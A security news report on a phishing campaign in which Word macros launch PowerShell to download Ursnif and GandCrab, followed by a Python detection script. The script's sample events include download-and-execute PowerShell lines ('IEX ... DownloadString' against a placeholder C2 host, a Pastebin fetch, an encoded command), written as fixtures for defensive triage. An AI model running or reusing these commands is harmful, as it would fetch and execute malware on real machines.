Beware of Malicious Word Documents that Download the Ursnif Malware and GandCrab Ransomware
A new phishing email campaign delivers a malicious Word document whose macros download and execute the Ursnif malware and the GandCrab ransomware.
SCS observed the campaign in the wild and detected roughly 180 variants.
The first stage of the attack delivers a weaponized MS Word document. According to the data, the documents were prepared from December 17, 2018 through January 21, 2019. The documents are embedded with VBS macros containing 18 lines of VBScript.
The second stage is the execution of a PowerShell script that creates a web client instance and calls DownloadString to communicate with the C2 server, storing the retrieved content in the CommonApplicationData directory.
If successful, the attack delivers multiple payloads to the infected machine: "the overall attack leverages many different approaches, which are popular techniques amongst red teamers, espionage-focused adversaries, and large-scale criminal campaigns."
The first payload, downloaded via the DownloadString method, checks the system architecture of the compromised host and downloads an additional payload from Pastebin, which is the GandCrab variant.
GandCrab is a widespread ransomware that keeps evolving with newly added features under constant development to target various countries.
The second payload is the Ursnif executable, which harvests system information; once executed it performs credential harvesting, gathers system and process information, and deploys further malware samples.
Researchers observed more than 120 different Ursnif variants being hosted, and the file name changes continuously within the campaign.
"While researching this campaign about 180 variants were located in the wild. Utilizing the VirusTotal Graph functionality these variants could be organized into several groups that were usually associated by either metadata or document structures."
SCS also noticed a separate Ursnif campaign in which the malicious macro contains a single base64-encoded command that downloads the Ursnif executable.
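The stages described above (Word macro launching PowerShell, a web client calling DownloadString, a drop under CommonApplicationData, an architecture check, a Pastebin fetch, and the base64-encoded variant) each leave a footprint in process-creation or script-block logs. The following triage script is an added example, not code from the original report or from SCS; the log lines, hostnames and base64 value are constructed placeholders, and the indicator names and scoring are this example's own assumptions.

```python
import re
from typing import Dict, List

# Indicators drawn from the behaviour described in the article, as (name, regex).
INDICATORS = [
    ("office_spawns_powershell", r"\bwinword\.exe\b.*\bpowershell(?:\.exe)?\b"),
    ("webclient_downloadstring", r"\bDownloadString\b|Net\.WebClient\b"),
    ("commonappdata_drop", r"CommonApplicationData|\bProgramData\b"),
    ("arch_check", r"\[IntPtr\]::Size|PROCESSOR_ARCHITECTURE|Is64BitOperatingSystem"),
    ("pastebin_fetch", r"pastebin\.com"),
    # -e / -ec / -enc / -encodedcommand followed by a base64 blob of non-trivial length.
    ("encoded_command", r"(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}"),
]

# Constructed sample events (not from the report); hostnames and the base64 blob are placeholders.
SAMPLE_EVENTS = [
    "parent=WINWORD.EXE image=powershell.exe cmd=-w hidden -c \"$w=New-Object Net.WebClient;"
    "IEX $w.DownloadString('http://C2-PLACEHOLDER/s1')\"",
    "parent=powershell.exe image=powershell.exe cmd=-c \"$p=[Environment]::GetFolderPath("
    "'CommonApplicationData');if([IntPtr]::Size -eq 8){$u='https://pastebin.com/raw/PLACEHOLDER'}\"",
    "parent=explorer.exe image=powershell.exe cmd=Get-ChildItem $env:ProgramData",
    "parent=WINWORD.EXE image=powershell.exe cmd=-NoP -sta -enc QUFBQUFBQUFBQUFBQUFBQUFBQUFBQQ==",
]


def match_indicators(event: str) -> List[str]:
    """Return the names of all indicators whose pattern matches the event text."""
    return [name for name, rx in INDICATORS if re.search(rx, event, re.IGNORECASE)]


def triage(event: str) -> Dict[str, object]:
    """Score one event. An Office parent plus a download or encoded command is the
    chain itself; a lone ProgramData reference is common in benign admin scripts."""
    hits = match_indicators(event)
    if "office_spawns_powershell" in hits and (
        "webclient_downloadstring" in hits or "encoded_command" in hits
    ):
        verdict = "high"
    elif len(hits) >= 2:
        verdict = "medium"
    elif hits:
        verdict = "low"
    else:
        verdict = "none"
    return {"verdict": verdict, "indicators": hits}


def triage_all(events: List[str]) -> List[str]:
    """Verdict per event, in input order."""
    return [str(triage(e)["verdict"]) for e in events]


if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(triage(ev))
```

In production the same indicators map onto Sysmon Event ID 1 (process creation, with parent image) and PowerShell Event ID 4104 (script block logging), which is where the DownloadString and architecture-check strings actually surface.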